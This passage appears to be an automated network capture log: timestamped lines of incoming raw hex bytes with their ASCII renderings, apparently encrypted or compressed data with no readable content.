9c 09 e7 34 f2 73 26 a8 d6 0c c4 7e ba fe 87 35 fb 0d 8e e8 fb Data Ascii: "syW<.0/IH8*-D@y2b% pz]zZZ>\U{.2<I'!2f\|#9kvh@c5BZdFUSqvfj<^&Qz_NTaQ<)"-HAH4s&~5
2021-11-25 15:51:58 UTC	1009	IN	Data Raw: 86 91 a9 53 70 a6 dd 34 4c f8 2f ba 12 a5 d8 a9 5e 91 1c fd c3 d6 a9 52 f6 e3 d0 be 03 28 12 a2 70 a9 6c 89 03 4b 8b df d6 95 0f 34 e4 37 b1 44 e3 5a 0f 21 6e 9d 84 42 45 db 83 d6 f9 96 0c 51 65 36 d8 45 d4 a7 96 0f 04 ae c6 66 9f 8c 67 37 35 f8 9b b9 4d 42 27 c1 9b b3 79 dd 3f 58 66 8a 54 f4 87 7e d2 4b bf 81 1e 97 02 b9 49 46 40 a6 a4 67 31 c1 17 f7 1c 8d 73 7d 50 1e fb 77 38 72 ae f1 e5 49 a3 53 3b 39 32 8f 6c 37 f7 69 b9 27 b7 d2 7b c8 bb 87 e0 99 68 a7 05 ae 23 0a 28 16 7d cc 0c 27 bc eb c2 ab 52 0c bb 58 79 59 99 cc 1c 6d db 3a a9 55 6e 94 b9 bb fa a7 96 f0 96 44 da 97 8e 9d 59 91 cd 82 f3 64 60 b4 8a 59 66 bd ee eb 60 02 e3 a9 1b c3 14 ab 72 31 8f a3 a5 47 44 16 a8 bd d6 98 81 6c fc 15 f5 a6 15 27 88 51 f9 10 bb 39 3e 3b 43 b2 41 57 5e 92 ed 14 71 Data Ascii: Sp4L/^R(plK47DZ!nBEQe6Efg75MB'y?XfT~KIF@g1s}Pw8rIS;92l7i'{h#(}'RXyYm:UnDYd`Yf`r1GDl'Q9>;CAW^q
2021-11-25 15:51:58 UTC	1010	IN	Data Raw: 2a 90 5b be 34 03 0c 4c a5 94 a2 33 84 4f 78 a5 5c 88 57 66 bc 65 96 4f 61 09 11 d8 43 d8 41 a8 8d 70 5b f5 f4 87 1c e3 84 cc 4f 47 6b 49 ac 53 44 5f 9d 46 56 b1 55 94 6c b4 c9 0a a7 9d b4 c2 88 8f 8d 64 86 7d c3 ea f4 42 2d 12 0a 58 64 c4 61 97 ce 52 62 c7 55 3a 69 00 fd 64 9d 24 8d 80 44 37 87 c7 25 dc a9 cf 30 d4 30 93 ed 13 cf 3f 9a 0e b5 80 40 a0 87 f6 fe f1 d6 3b 0d a8 49 d6 e7 f0 33 8c 6b df b1 d0 73 aa de 6a 56 9e 3e 18 4f 8f 26 e0 8f 1f f3 9d 58 82 02 83 f9 61 a0 a8 03 30 eb 97 b1 45 59 b3 61 47 55 56 dc f3 32 e4 be e6 f3 e5 46 66 8f 74 22 2f 15 2d e2 10 25 dc 67 9a 8f 06 4a 38 07 ae 5d 94 99 67 8f 9a 61 fd c8 b7 89 8e 24 20 d8 e7 fb b9 99 eb 27 00 e4 e8 72 4d b9 ed 3a 27 4f 70 4a 23 ef 11 d6 56 77 e4 de c1 5a fe 51 49 48 34 8f 05 d8 40 b0 2f 61 Data Ascii: *[4L3Ox\WfeOaCAp[OGkISD_FVUld}B-XdaRbU:id$D7%00?@;I3ksjV>O&Xa0EYaGUV2Fft"/-%gJ8]ga$ 'rM:'OpJ#VwZQIH4@/a
2021-11-25 15:51:58 UTC	1012	IN	Data Raw: b7 46 66 19 79 1e c5 e5 2f 71 72 a3 a3 96 42 9a 4f 46 e5 25 92 5e 9d bc ed 04 aa 19 46 ec 12 5e c9 59 3c 25 d0 16 4f dd e4 ea 8d 89 0b 64 b2 c6 ad 14 38 6f 17 c6 a1 bd 09 cf 5f 21 6a 43 a5 ff 86 44 de d5 62 e3 91 e8 7e a8 ff 70 e4 74 a5 9b 59 04 bd fd d7 9d 8c 5e 99 7a b2 9d b8 ca 87 6c f5 e6 0d 23 d0 57 7e 4a 2c f7 98 00 1a a1 d8 e7 bf 61 09 be 0c 4b 00 88 62 8f 1b b1 b7 31 b2 fd 77 2a e6 18 7f cb 06 52 95 b2 57 2d 72 ee 54 ff 32 3c 9a 34 fd a7 f8 2d ab 60 18 d8 eb 3b ed f7 a2 c4 37 87 75 9d 32 52 fd b6 1d 9e be e3 df 46 20 83 bb 5b 10 65 8f 10 1f 05 7e 7d c6 76 a6 df 93 a3 ae f6 ea 1d f2 ef b1 bd 26 6b 31 78 d3 39 36 7e 98 46 e4 4f 8d f2 61 07 2b 11 31 6d 04 24 91 7c 1d f2 5b 11 54 b1 c4 d8 a7 9a e4 6f c8 c1 22 50 c0 18 5e 9d 30 4f e1 8b dd a6 c5 f2 25 Data Ascii: Ffy/qrBOF%^F^Y<%Od8o_!jCDb~ptY^zl#W~J,aKb1w*RW-rT2<4-`;7u2RF [e~}v&k1x96~FOa+1m$\|[To"P^0O%
2021-11-25 15:51:58 UTC	1013	IN	Data Raw: c0 0b cb 08 a6 cb 63 99 6c dd 79 e1 2a 94 ed 1b ff 1e e0 68 db 5d 8c 70 a7 9d b6 c4 11 2d d1 b8 e0 f1 3a 33 62 fb 27 68 24 f6 e2 12 b2 85 65 3c 22 65 88 c3 d6 4d b7 04 07 32 82 32 3d e8 48 f7 4d 2f 36 36 38 38 0b e6 5e 1b 06 92 62 80 79 dd 57 09 d6 e1 f6 1b cb 06 40 c8 87 0c 5e 91 79 29 a4 34 fe 7b 3c 25 e6 75 61 f8 f8 3c 12 6c 82 36 51 22 63 37 51 c0 da 0a a7 1a 90 e5 26 1f c9 08 a7 29 10 06 fd 07 06 b5 8f 66 b9 c3 1d 06 48 8c e7 28 9c 4e 66 33 bd d6 9f 15 f1 d0 bd 66 28 13 79 dc f1 e4 cb ee 86 07 0c aa db 49 fd 85 66 cb 2c 79 e8 4a 23 82 fe e6 24 c4 9f 38 d3 75 52 e3 2f 10 1d 50 f3 41 66 17 55 26 83 92 1a 7c ad 31 b4 eb fb 80 48 f4 92 f2 30 89 f8 10 f1 76 92 24 69 f6 17 8e 42 ee 0a 1a 63 82 90 50 03 7d fe 3a 0e 56 74 76 41 f0 6b 3c 11 d9 ae 25 1d c4 ad Data Ascii: cly*h]p-:3b'h$e<"eM22=HM/6688^byW@^y)4{<%ua<l6Q"c7Q&)fH(Nf3f(yIf,yJ#$8uR/PAfU&\|1H0v$iBcP}:VtvAk<%
2021-11-25 15:51:58 UTC	1014	IN	Data Raw: 4b 70 ab f9 1c 48 cd 0e a7 4f 42 d7 27 eb 7e ac 26 61 80 c2 cc 68 be db e4 b6 75 d3 bb e8 32 e6 29 e4 44 3d b9 a0 84 40 c0 12 5c ad 6d 08 0f ea ff d0 22 3a 3e 19 2e 6f 1e 9f 59 86 7c 4a f2 67 85 66 cb 5b 50 c0 d7 94 89 d2 80 4a 2a 6f 53 75 d7 27 67 e7 2a 19 4c 47 0c 42 ec 45 54 09 34 9d 12 5a 19 24 56 e1 c0 ea ef 07 ba f2 ea f8 45 73 1f c9 31 7e 5f 12 be 8a c2 49 b4 1d fa 1f fb 82 ee 30 1a 15 c4 a2 d3 42 42 e8 4a f4 2c 0f 43 a2 cb 38 3c 23 e1 58 67 49 2f c2 90 20 9d de 29 01 1d fc 3d ae c0 65 e4 10 d7 34 ef 0b f9 a6 15 c5 9a 83 a6 63 34 36 3a c8 92 22 f1 82 40 21 d1 39 3d 47 04 34 1d 88 28 ae cb 75 5d 04 22 98 5c 80 ce 54 b3 cf c1 ba cb e3 a4 02 8b d1 3f 9b 1b 50 0d 39 ce 8b d1 0a a7 11 5c 09 a2 79 bf f7 92 2e e6 e1 c1 a9 57 c7 80 de c2 6f c7 de 0b 63 a2 Data Ascii: KpHOB'~&ahu2)D=@\m":>.oY\|Jgf[PJoSu'gLGBET4Z$VEs1~_I0BBJ,C8<#XgI/ )=e4c46:"@!9=G4(u]"\T?P9\y.Woc
2021-11-25 15:51:58 UTC	1016	IN	Data Raw: b3 7b cf 09 db e4 7f 6a b4 16 05 0c 47 b5 d6 97 c5 26 8c 9d 86 93 78 6b cd 33 84 c4 2c e5 f8 de a0 67 d8 a6 1c db 15 23 11 b2 00 b8 f7 ad 31 09 da d4 e5 11 d1 01 89 03 c3 b8 f0 f7 d2 94 50 f3 e1 3e c2 89 26 56 d2 40 4b 7e 4d 2f 4f 3e 92 e0 de bd 5d 94 61 36 34 02 87 72 15 3c b3 d2 4c 93 06 aa c4 9f ba f8 12 f8 21 66 32 e1 f7 d2 6e aa e6 4e 04 db da 36 5f 2c 29 95 b0 44 7e ac 51 fe ec 37 23 fa fe 37 86 d2 22 8a 96 41 80 75 db 2e 3c ea 9a 9a 3b 2e e8 9d 35 4e fc 3c c2 76 6a 3c d1 db 6c 8a f0 3d 26 2d 9e 08 4b 30 6e 67 0a 93 7b 3b ac ec 26 f4 fa ee 21 37 8f 9a 84 9b 3e d6 93 07 76 9a 58 e8 74 45 a9 35 66 8a 5d 11 30 05 da c9 8f 5f 70 1f 00 77 3b 9a 8d 8f a5 aa da 9a 82 cd f0 f6 8a 90 4e 6b 2f e1 86 88 7f 3f 30 a7 a7 cf 4a 7d 84 de ca 1c 93 c2 6b 69 38 b9 ee Data Ascii: {jG&xk3,g#1P>&V@K~M/O>]a64r<L!f2nN6_,)D~Q7#7"Au.<;.5N<vj<l=&-K0ng{;&!7>vXtE5f]0_pw;Nk/?0J}ki8
2021-11-25 15:51:58 UTC	1017	IN	Data Raw: 91 68 4d 7a 11 fd c8 b1 70 1e 78 af cb 37 39 4b ae 52 03 35 b7 f0 2f a3 ea 7a 5d b6 c7 e1 24 5f 8c 83 82 d8 11 2b 91 ac 53 38 cc d7 21 ec d2 88 9f a6 2d 02 4f 6f 7b 1d c4 99 d7 16 77 da 9f 56 fb 50 63 87 75 23 a6 ab 30 bd 62 19 91 a3 a7 97 8e fc 11 e8 e7 4c 42 30 4a 43 46 87 2f e6 c0 12 09 bb 9f 1d fa e3 a4 0e 64 b6 f9 92 b3 7c a2 c9 34 90 8b af 0d 50 fe 3e d7 4d 4e 79 44 c0 0b ab 61 f2 aa e7 2d 68 8f 5a ea 7f fb 87 49 4f a3 9d ba c7 2d 36 bd 8a 0b 89 68 54 01 95 05 b7 f2 f3 ab a5 9e 32 3d 59 06 b4 79 44 c0 28 19 fa 2b e9 54 c2 55 58 db e9 f3 56 7c b5 1d 4f 7a b5 97 08 32 96 8f 0f 96 3b c5 1a 4a 3f b5 4f e6 c1 0c d0 21 2b 38 52 09 e3 d0 47 d2 b2 5d c8 af c7 90 f3 ae 2b 7c 4c 2b 37 34 39 88 59 67 bc 78 bc 0c 97 72 46 bb 59 6d 3b 71 b8 60 26 9d 55 e4 db 23 Data Ascii: hMzpx79KR5/z]$_+S8!-Oo{wVPcu#0bLB0JCF/d\|4P>MNyDa-hZIO-6hT2=YyD(+TUXV\|Oz2;J?O!+8RG]+\|L+749YgxrFYm;q`&U#
2021-11-25 15:51:58 UTC	1018	IN	Data Raw: 58 ec 85 90 d3 bb 6c b8 cc 2e d9 b7 db 65 ac e5 c2 19 d8 53 a3 35 be ed ff 8d e2 7b 81 ad 04 8d d8 59 35 51 1e 72 45 62 2e 81 4a 4e 79 56 aa 60 5a e3 f0 d1 e3 c3 1b cb 92 86 2d 0e 8c 64 86 ff 0a fb c2 c1 14 5e 70 b7 fe 82 e3 40 48 aa e3 04 8e e0 d6 99 26 e7 3a 77 4e 15 6a 8b 74 b4 14 38 0d 2d a8 df e1 cf 07 6f 70 ff 82 72 4d 58 e1 29 73 74 97 81 fc f0 0f 6f 10 c5 45 a4 80 43 6c 23 af 93 e6 7c 4f 8e 0e 69 8b dc 96 08 94 85 b6 4d 1c 49 4b b3 2b a8 21 03 09 19 c4 ac 5f 94 1b b6 9c 0a f0 22 03 b9 80 1e e0 a0 b0 c6 69 d9 67 36 05 35 2b a7 ae 57 52 fa 99 54 e7 22 89 d2 6e 99 7c 51 df f1 61 01 40 14 0d 18 a1 da 72 ac d0 8e 16 b0 7c 87 c9 de 38 d0 43 5d a1 cf b2 fa ab 68 90 17 c2 14 b7 8b d8 4d b8 c4 7e 99 d4 da e9 fd bf 85 04 b8 02 a2 53 51 7c 42 3a 2c 1b 16 2f Data Ascii: Xl.eS5{Y5QrEb.JNyV`Z-d^p@H&:wNjt8-oprMX)stoECl#\|OiMIK+!_"ig65+WRT"n\|Qa@r\|8C]hM~SQ\|B:,/
2021-11-25 15:51:58 UTC	1020	IN	Data Raw: 62 6b 3a 9e a4 c7 77 77 d9 b5 e8 3d 7a 45 69 0c 48 a7 a5 c1 21 e0 6f 2f 12 bf 24 e3 af af 2c a0 03 df 6e 9a 35 08 a3 2d 1f a9 cf 23 e2 4b b3 50 c1 db b2 4f 99 d8 20 12 95 73 e6 13 4e 1b ac 20 3b ab bf 85 63 9b 38 b3 53 97 83 f8 2f 8e 12 4c 07 04 b8 ce 47 5e 9b 15 f7 70 a5 a4 85 cf d1 ce 2a fc 03 7b c4 78 b6 7e bb 66 71 40 1f fa 15 c2 68 36 0d c3 1c 4a 7a 60 74 f9 75 74 a9 bc 7d c1 b2 f3 5e a1 a8 d3 32 88 91 64 83 61 b5 74 1b 7b c6 9c 32 99 17 9b e6 2d a6 1f 16 54 6e 5f 75 66 b6 77 52 22 00 07 cf 70 23 8c 84 e6 c5 e8 97 ba 6e 1e 79 63 02 42 26 68 3a db e2 f9 a4 97 b7 c7 25 72 2f 14 df 8a 6b 4a f4 10 a8 c0 2b 55 3e c3 02 83 d3 54 71 af d0 5e fe fe 51 e3 d3 ea be 7b ba b5 f1 c7 b0 e3 cb 7e ef ca 55 ba 72 56 b7 ef 71 ac 22 d3 0c 0f 2d 04 f2 ab 48 c0 eb 08 0a Data Ascii: bk:ww=zEiH!o/$,n5-#KPO sN ;c8S/LG^p*{x~fq@h6Jz`tut}^2dat{2-Tn_ufwR"p#nycB&h:%r/kJ+U>Tq^Q{~UrVq"-H
2021-11-25 15:51:58 UTC	1024	IN	Data Raw: ff da a2 53 71 c0 ee cb a4 de 94 c0 43 da c2 6c 5d 8a 5f 29 96 37 b7 46 36 8d d3 d2 b0 7a 65 67 de 54 fc 32 ec 6d d5 a7 97 8e 8b 63 c9 6d b3 bf 26 e3 de bc d8 36 a3 25 b3 6d ce 87 cc 7a 4f 7f 37 16 46 dc eb b8 07 9f 25 ef 58 ba 1e cd 98 09 9e 6e 54 4c 4a fe ae 85 1c d2 23 ed 46 c9 e6 eb 24 61 a0 5a 09 96 d9 16 fe 1c 85 55 ac ee ce a7 41 e1 1e 49 eb 96 ec c9 ca 8a dc 29 27 3a d4 4f 61 a2 1b 75 b3 b8 99 8b a8 70 c6 91 9c d3 b0 a8 7c 72 34 40 f4 72 99 b4 19 29 80 de c6 d4 38 5f 2b 99 61 1b 73 c5 e8 73 ce d4 a3 46 60 af 76 6d 83 1a cf 79 37 39 88 11 32 fb b4 66 36 0c 14 6f aa 40 72 7d 5b 1a 76 a8 cd 89 2b d5 c2 80 7d e8 6b af ab aa 3e a5 2a e6 5f e7 92 8c 0b cb 39 99 e7 33 f7 ec d3 e3 57 ef 03 7d 30 49 92 90 86 e3 36 8f a8 2e 19 77 dd d6 94 b4 c1 2d 9f be 74 Data Ascii: SqCl]_)7F6zegT2mcm&6%mzO7F%XnTLJ#F$aZUAI)':Oaup\|r4@r)8_+assF`vmy792f6o@r}[v+}k>*_93W}0I6.w-t
2021-11-25 15:51:58 UTC	1028	IN	Data Raw: 2b 2a f6 fc 05 d3 d2 e1 fb 8d d6 63 6c 34 6e 4b 0d 25 e1 ce 83 ef 0c e6 4b 45 59 6d 87 10 b7 3e c1 e6 4c dd 41 5e 66 99 86 d0 f1 72 a2 c6 69 a1 24 eb 7f 86 69 36 39 85 15 27 dd 2a 68 b6 fb 8a 5f 86 f1 b3 6b 26 60 ac 39 54 c6 ed fe 04 4e e3 5d 8d 70 f6 e3 e1 f8 13 20 96 38 04 bf 5f fe 98 cf de 45 6a 20 3d 1e 14 65 3c d0 4d 41 5e aa d6 01 0f 24 96 47 cc 00 c3 59 1d fb b4 19 e1 ca bf 51 77 4d 1f 76 7d ce b0 f0 0c 57 8d da 9d b7 71 c2 60 ae c7 19 f6 93 c1 f4 6d 06 8e f4 e1 fc 07 32 3b 32 86 f2 35 2b fd b3 40 c6 f1 3c d5 33 32 07 83 f4 92 51 99 d3 08 a3 47 45 63 82 fc 99 63 59 e9 91 05 05 ac 0c 95 e0 49 c8 36 33 ec 21 c7 17 94 9c d2 f1 0f 99 ab 51 76 6e 3c bd f7 24 63 02 b3 4a 2a ee d3 3a 3b a1 10 59 e4 5c 7e 46 e6 7b f2 53 6a 53 4b 72 c0 02 15 c5 2a 16 45 14 Data Ascii: +cl4nK%KEYm>LA^fri$i69'h_k&`9TN]p 8_Ej =e<MA^$GYQwMv}Wq`m2;25+@<32QGEccYI63!Qvn<$cJ:;Y\~F{SjSKrE
2021-11-25 15:51:58 UTC	1029	IN	Data Raw: bb 54 b7 f9 e8 73 2b 5a 8f 22 50 f3 d7 11 42 2e 20 7b f7 97 88 ef 4a 22 95 83 f0 62 b6 bc 14 60 90 15 1b e1 62 b3 7e 70 ac 57 8b 0e b6 fe 3c 21 63 bb 8a 8d 13 e6 47 6e ef 23 c5 29 ac 37 04 bd d3 30 b3 cb e1 58 8a ea fa 41 e9 82 46 d0 05 30 bd ef 16 ad 17 5c 02 f3 69 40 24 52 15 d0 4c 7e 71 92 91 75 26 6a 8b da 99 1b 76 05 d6 df d4 a1 05 36 91 0a 41 7a 6b 3d aa e3 44 58 b6 35 8d dc 61 fc e3 2f 88 61 0a 3e 75 29 ee 65 0b 1e 16 cc 61 f4 e7 f2 58 df 4c 8f 2c 32 0b 1b 17 77 ef 46 dd 5c 70 d9 dd dc 60 91 13 82 51 55 6d 0a 5a 09 ce ba ff 81 68 ec eb 83 f1 e9 95 0a 9e 3e 18 a1 c8 52 55 b3 6a 53 cd 08 ae c0 51 d4 09 ee 47 5a df da a3 1e ef 02 40 d2 86 4e c5 8d ac e9 8b e8 75 3c 69 db c3 2d 27 01 2f 66 74 9c 37 80 ed cd f2 8a 5f 2d 9e 36 a4 df 33 6f 25 ea 73 b5 3b Data Ascii: Ts+Z"PB. {J"b`b~pW<!cGn#)70XAF0\i@$RL~qu&jv6Azk=DX5a/a>u)eaXL,2wF\p`QUmZh>RUjSQGZ@Nu<i-'/ft7_-63o%s;
2021-11-25 15:51:58 UTC	1033	IN	Data Raw: 7b 40 b3 05 bd 59 6d 38 d3 d8 a5 37 07 04 17 f4 82 ef b2 00 88 6e a1 5d 01 9c be a3 90 65 0a ab 8c f3 61 9c 73 fc 7e 7c 7b 2c a3 95 6f 36 c6 04 00 81 42 d3 b1 cd 5f 2f b7 74 98 fa ff 02 59 ff 0c 4e 1f 25 74 2c 86 ef 6a 38 67 ae ca b3 41 bb 0d f6 8e 82 e3 5e 8e 1a f3 28 49 19 bb 2d 11 24 ef 03 7d 2e 4c fb bc de 6f bc 75 10 4f d9 5c 98 0a 97 1b 06 5b 22 6c 8f 92 9b 1c 94 e9 fa 1a 79 ee 3c bd 44 ee 69 d1 cc b4 02 18 71 ca 27 d1 da c9 3f 55 6c 3a 3d 5f e4 43 6d 0c 1e 4a 70 97 6f 43 6c b1 4c ff 05 bf 35 50 d8 99 87 0b 44 d3 9f 5e b7 47 55 68 b8 ce 1b 60 2f 82 c2 a2 df 3e 20 70 92 28 94 91 dc f6 6f 23 ea 99 e3 f9 39 be 0e b3 40 2a 1a 7a e7 15 5b 56 53 05 0d 16 a1 c7 2b 7e 6b cc 80 45 57 62 0f 5c d6 7d e7 fe 0a 0a 90 b5 f6 fc f0 6c b1 47 5e 1b 74 f5 d1 ea 72 9f Data Ascii: {@Ym87n]eas~\|{,o6B_/tYN%t,j8gA^(I-$}.LouO\["ly<Diq'?Ul:=_CmJpoClL5PD^GUh`/> p(o#9@*z[VS+~kEWb\}lG^tr
2021-11-25 15:51:58 UTC	1037	IN	Data Raw: 95 00 89 7e ad d9 5e 15 72 a1 28 fe d8 98 3d ce 48 db 77 36 c0 10 77 10 3b 01 d4 15 02 25 b4 8a 8c 59 61 eb 95 b4 2d 8e a9 57 a3 c1 a2 c8 8d 00 12 2b 1b bc c8 62 8e 29 7b 24 1f 07 a3 d5 dc 18 b5 7c 8c ee ee 96 35 07 ad 14 bc 1a 4e fd 7f d8 99 7e e2 92 2b 7d ff 82 09 1d f7 30 2f 71 d4 a4 ca be 09 a7 af da 9e 60 61 bd 65 f4 e0 62 76 6d ca 08 a8 4e c0 b2 2e fb 07 3f b4 66 01 62 b7 79 e6 42 43 ab 1e e0 49 a2 b5 d5 3e a2 c9 45 a9 17 a9 6c bc d4 2b 09 84 a1 5c 63 ed 5a ef 61 1c 9d 4b 78 13 b2 25 df db 3a dc aa 64 8a e6 1e 81 8a 5f 12 a7 0c 92 f6 96 e0 d1 da 80 db 5d 53 0c 4d 7f c8 7e 07 c5 7c db 25 ae 69 3c a1 36 de 06 3c 3d 28 be 47 a7 2c a7 1c 45 e2 79 40 b3 1c 90 d0 be e8 9d 1d f6 ac d4 7d c0 dc ee 59 d3 0d a5 3a c0 e0 0f 72 6f 11 d9 86 95 ac 12 b2 7e 49 f5 Data Ascii: ~^r(=Hw6w;%Ya-W+b){$\|5N~+}0/q`aebvmN.?fbyBCI>El+\cZaKx%:d_]SM~\|%i<6<=(G,Ey@}Y:ro~I
2021-11-25 15:51:58 UTC	1041	IN	Data Raw: f9 9d 65 02 86 0c ee a2 85 fc 08 5f 4b bd 9f 89 1c 1a 46 14 ef d2 ba cd a7 32 e0 c6 a8 35 83 74 20 96 f8 54 c4 ae cf b9 e3 98 c8 21 d9 24 82 8e 2d 3c 12 b2 32 2b 0f 3b 35 3c 1b 79 8f 19 71 10 5e 66 63 30 a1 a0 9b 21 63 8f d9 00 8b e9 f9 65 19 13 27 ff 3a b4 6e 31 ca 65 7f cb 03 d2 d1 0f 5e 1e 13 d8 a6 15 c5 8f 73 7b 54 93 04 38 ee 75 54 0b 65 9a 1c 14 d7 c2 d1 c1 55 c5 c2 fc 8c 9c b9 7e d3 cf 80 70 58 6b 0c 6d 2f 1e 9f 15 f6 fe f2 8f 63 f1 1c 9d 51 8e ec 99 ac 2c f4 3a c4 65 72 4e 1e 5a 57 88 8b 94 e6 a7 d9 c1 fb 9d 44 3b c7 ef 15 84 97 79 8c 8c 85 ae 25 13 95 6c 4a 99 6d d3 78 ab b2 f2 c9 e1 25 d2 50 1a 26 97 76 45 b1 b6 ec d1 d0 44 ba 16 bd 68 05 cb ed a7 0d cd e0 3c c4 65 9f b2 d0 33 06 57 94 04 49 ab 55 52 c0 d8 57 82 75 2e e9 cf ae dd 38 dc 65 10 ab Data Ascii: e_KF25t T!$-<2+;5<yq^fc0!ce':n1e^s{T8uTeU~pXkm/cQ,:erNZWD;y%lJmx%P&vEDh<e3WIURWu.8e
2021-11-25 15:51:58 UTC	1046	IN	Data Raw: c4 13 c3 f2 1b 78 f3 22 80 ad 60 a7 97 80 b5 89 d6 57 8f a3 26 e4 bc 0c a5 9c 05 35 2e 93 78 6d a4 a6 ac 45 da 20 22 b0 29 9b 85 04 26 f9 1e 9d e6 0c f9 68 bd 62 6f 3f 75 4b 8f 81 1a 02 26 6a c7 72 37 43 1a df c4 65 09 a8 7a 81 11 2c 42 e6 78 54 3d c4 a3 52 8d d8 93 95 71 dd df 5c 7f 22 65 96 e7 3c 0d b3 75 d5 a2 d5 39 c4 1c 4b 42 45 0e 27 13 da 2a b1 c0 0b c9 d1 38 39 b1 bb 93 96 9d 28 ed 04 75 df d2 82 92 93 ed b0 30 ea 74 3e 80 d3 d7 dc 97 82 74 95 70 4d 7e cb 81 04 5f c7 2a 27 e3 3e a0 37 f8 a2 22 6e 94 e1 cc 0d 8b 6b ce 46 78 65 33 85 1d 02 b2 51 e9 1e 97 04 b8 f6 2d 7f 50 fb d3 a6 1b c8 8c 9a 36 a6 5d fa ac d2 8b e9 11 3c 5c a6 20 48 2a ee 5f 9b 3b 56 1b 87 c3 2c 13 36 b6 f5 ce 61 0d 2b 99 62 05 09 cb 92 84 81 b9 7a ab 53 46 d3 3d 52 d4 ea 42 e3 c4 Data Ascii: x"`W&5.xmE ")&hbo?uK&jr7Cez,BxT=Rq\"e<u9KBE'89(u0t>tpM~_'>7"nkFxe3Q-P6]<\ H*_;V,6a+bzSF=RB
2021-11-25 15:51:58 UTC	1050	IN	Data Raw: 10 51 d9 bd 89 11 55 85 03 ad bb ec 40 a5 45 b7 45 cf ab dc 05 2d a0 31 88 9d a8 d3 b4 62 03 d1 73 b9 63 ee 8c e7 3b 9c 3b 12 d9 de ca 15 3f 5e 06 53 80 49 cb e3 4a f3 7b 42 44 97 b3 4d 79 ef 18 2f b8 67 9c b5 86 30 95 91 4d 35 1a 9f 4a 6d a8 23 d6 46 3f 95 7e fa 96 f9 1b f0 61 e5 f8 2f 6a 85 40 2e 8d 78 1c 3b 22 52 fc 33 86 87 99 bb 97 8f a8 45 db 40 c7 40 ad 40 ec 52 51 a2 d2 1f 67 ff b7 8b 73 29 6a 1e fe e5 37 8f 94 f2 59 5d e7 fa af 73 a5 2c 42 a5 3a 08 92 ed c8 86 80 52 fc ea 70 aa 41 d2 3a df 80 ce a3 56 7b 4e 17 cf 36 8c ea 89 12 d8 44 21 74 41 cf 3c bf 89 1a 7c c0 78 c0 b7 dd ea 44 e1 36 25 e2 d4 22 f2 8d b1 c7 71 cf ca 10 b3 4a f2 d5 bf 88 fc 93 61 ec f5 6c 45 53 fb 64 05 05 bd e8 f0 2b 0e 50 f8 23 02 dc 62 1d 61 97 79 9d 2d f3 0a 4e 0a 44 d4 a8 Data Ascii: QU@EE-1bsc;;?^SIJ{BDMy/g0M5Jm#F?~a/j@.x;"R3E@@@RQgs)j7Y]s,B:RpA:V{N6D!tA<\|xD6%"qJalESd+P#bay-ND
2021-11-25 15:51:58 UTC	1054	IN	Data Raw: 26 83 84 61 32 0d 26 f6 5d 7a a6 2c 1d 14 39 8b bf b6 59 59 cf dd 3f 5f 21 e6 42 d3 be 6f 79 73 d0 b2 ff 6f c8 bf 61 06 8f 12 a4 53 17 c0 e7 f6 93 d7 ff 76 60 ed 1c 69 ae 71 23 4b b5 86 96 37 86 4a ff 16 d6 fe ff 67 0e 60 75 25 e3 c3 11 ec f3 06 a9 47 c4 ae cf a0 66 8e fc 0d 17 79 de e6 b1 b8 d6 a1 d0 b6 f6 97 15 82 bb 99 bb 52 01 69 e3 39 42 db e4 49 74 33 17 8d 75 2c 2e 00 66 7e 95 9b 39 b2 f1 17 ad 5a 6a e4 18 bc e3 cd ac dc ee f5 75 fb 85 c1 1a 7f 43 c5 45 61 e7 c1 29 62 6d 04 b4 c0 e3 46 3b c0 37 3d a6 20 e3 83 9f 5b 1f c1 b7 44 79 58 16 a8 db dd df ee ef 65 47 01 f6 18 70 42 bc 30 fb fa 24 5c 9d 8f 0f 59 37 a9 bd 6a 87 18 a7 7a 97 1a 43 60 7c 5a e4 d6 f6 e9 16 7c 4a 33 9b 88 e9 7e d9 cb 49 c3 0b b9 a2 ad bf 19 7c af 3d e4 0d a8 2c 4c 38 6e 66 82 7e Data Ascii: &a2&]z,9YY?_!BoysoaSv`iq#K7Jg`u%GfyRi9BIt3u,.f~9ZjuCEa)bmF;7= [DyXeGpB0$\Y7jzC`\|Z\|J3~I\|=,L8nf~
2021-11-25 15:51:58 UTC	1058	IN	Data Raw: c9 42 da 97 69 ac 6d 63 a1 e8 2a a4 29 24 6b af c3 ed 04 b9 23 fb c7 11 e1 3c 3c a1 18 50 07 a7 8c d9 29 6b c5 27 1e 4b fa 29 0a 35 ea 02 f4 18 71 c6 92 aa 11 5e 3f ca 35 b3 fd 8a f0 e6 b5 88 e6 12 aa 91 96 3c d7 bf c1 12 9f 53 23 50 f4 a1 95 0c 2d 61 f3 71 77 70 e1 f2 5e 38 fc 8a ca d4 1f f3 11 25 73 cf 04 07 32 82 f2 32 b2 8f a0 08 5f 26 9a 1f 68 1b f4 5d b4 3a 8b e8 c3 20 f2 ed 01 fc 90 49 b2 8f a1 95 7c d3 9e fb 5a 06 a9 f6 65 b0 c2 1e 96 f5 54 7f 92 d0 f2 58 df 7b 41 11 38 df 7f cb f2 9b 78 bc d3 8c 59 fc 82 2c 85 a1 93 96 f9 9d 1a dd 3f 84 4d fb 86 c2 a7 21 65 e6 b2 1b b4 fd d1 09 27 1b 9d 33 7d 37 7d 55 09 15 c2 a2 2f 12 da b1 80 5a 6c 37 dd df 6a 0c 65 97 88 5b 82 9f e5 2c 5d dd 54 0d 84 43 bd 61 ad 6b ee 08 33 6d 68 24 0b bc 60 33 5c 74 40 4c 6e Data Ascii: Bimc*)$k#<<P)k'K)5q^?5<S#P-aqwp^8%s22_&h]: I\|ZeTX{A8xY,?M!e'3}7}U/Zl7je[,]TCak3mh$`3\t@Ln
2021-11-25 15:51:58 UTC	1061	IN	Data Raw: fe 89 1c 89 63 5a cc e8 7c 7a fa 26 f7 7f 24 f2 31 a9 4d 4a f2 85 e9 21 59 5d 89 02 54 7b 9c 4c da 97 8e a4 14 de a5 57 b5 3f 42 cc 81 c9 bb 63 8a 95 68 7e 19 65 6e af 43 f1 d9 b6 11 37 62 c8 2a 7b c0 e2 e2 7e c4 66 7e 80 15 6c df d3 05 87 cd 8e f1 00 42 97 06 a5 a9 59 c2 05 a0 d0 50 29 c8 0a b1 71 27 5a 62 0b d2 4b 9c 7e b6 e8 46 dd 37 dc 99 3f 26 eb 0b c4 4e a1 60 fc 0d 2e bf f4 8d 07 ce 43 1f 2b 81 c9 0e f6 85 08 4b d8 3b e5 73 47 5f 14 e9 72 2f 78 a6 ae 8f 1f e7 c3 21 59 b5 ed 18 af ee 3c 2e 11 e0 57 d2 69 b5 8e ec c4 d5 23 fb 8c 55 dd 1c 